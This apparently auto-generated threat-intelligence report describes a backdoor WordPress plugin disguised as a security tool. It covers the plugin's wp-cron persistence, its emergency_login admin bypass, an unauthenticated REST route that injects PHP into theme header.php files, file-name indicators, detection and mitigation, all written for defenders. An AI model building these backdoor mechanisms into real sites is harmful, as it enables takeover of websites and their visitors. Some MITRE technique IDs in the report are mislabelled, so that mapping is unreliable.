Full Report
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it. [...]
Analysis Summary
# Tool/Technique: WordPress Backdoor Plugin
## Overview
A malicious WordPress plugin disguised as a legitimate security or performance tool, designed to establish persistence, grant administrator access to threat actors, and execute arbitrary code on compromised websites.
## Technical Details
- Type: Malware (Backdoor Trojan specifically packaged as a WordPress plugin)
- Platform: WordPress / PHP environments
- Capabilities: Persistence via file recreation, backdoor access via emergency login mechanism, remote code execution via REST API endpoint, and potential JavaScript injection for visitor compromise.
- First Seen: Discovered in late January 2025 by Wordfence.
## MITRE ATT&CK Mapping
The behavior described maps to several defensive evasion and persistence techniques:
- **TA0003 - Persistence**
- T1556.002 - Modify System Image: Plugin re-creation via `wp-cron.php`.
- **TA0005 - Defense Evasion**
- T1070.004 - Indicator Removal: File Deletion (Attempted, but promptly reversed by the malware).
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer: The plugin acts as the initial access point and persistence layer for C2 communication.
- **TA0002 - Execution**
- T1059.005 - Command and Scripting Interpreter: PHP execution via theme files and REST API.
## Functionality
### Core Capabilities
- **Persistence:** If the malicious plugin is deleted, the modified `wp-cron.php` file automatically re-creates and reactivates it upon the next site visit.
- **Backdoor Access:** Provides immediate administrator access using the function `emergency_login_all_admins` triggered by the `emergency_login` GET parameter, logging in as the first existing administrator user if the correct cleartext password is provided.
- **File Manipulation/Execution:** Registers an unauthenticated custom REST API route allowing for the insertion of arbitrary PHP code into all active theme `header.php` files.
### Advanced Features
- **Cache Clearing:** Ability to clear plugin caches.
- **Visitor Compromise (Potential):** An updated version can inject base64-decoded JavaScript into the site's `<head>` section, potentially for phishing, spam distribution, or redirecting visitors.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names:
- Malicious Plugin Name: `WP-antymalwary-bot.php`
- Other observed plugin names: `addons.php`, `wpconsole.php`, `wp-performance-booster.php`, `scr.php`
- Modified File: `wp-cron.php`
- Target for Code Injection: Theme `header.php` files.
- Registry Keys: [Not applicable for WordPress file system malware]
- Network Indicators:
- C2 Server Location: Cyprus (Specific IPs/Domains not provided).
- Behavioral Indicators:
- Modification of `wp-cron.php` to programmatically activate a malicious plugin.
- Access log entries containing `emergency_login`, `check_plugin`, `urlchange`, and `key`.
- Unexpected PHP code injection within theme `header.php` files.
## Associated Threat Actors
- Not explicitly named/attributed, but observed by Wordfence. Researchers noted traits similar to a June 2024 supply chain attack involving WordPress plugins.
## Detection Methods
- Signature-based detection: Searching for the presence of the specific malicious plugin files (`WP-antymalwary-bot.php`, etc.).
- Behavioral detection: Monitoring filesystem changes, specifically modifications to `wp-cron.php` and theme `header.php` files. Monitoring for HTTP requests containing the `emergency_login` GET parameter.
- YARA rules if available: [Not specifically mentioned in the article]
## Mitigation Strategies
- Restore `wp-cron.php` to its original, uncompromised state.
- Delete the malicious plugin files.
- Scrutinize all theme `header.php` files for injected JavaScript or PHP code.
- Review user accounts and immediately change all administrator passwords.
- Investigate hosting account security if FTP or hosting credentials are suspected of being compromised.
## Related Tools/Techniques
- The persistence mechanism relies on abusing the legitimate WordPress functionality of `wp-cron.php`.
- Similar malware seen in the June 2024 WordPress plugin supply chain attack.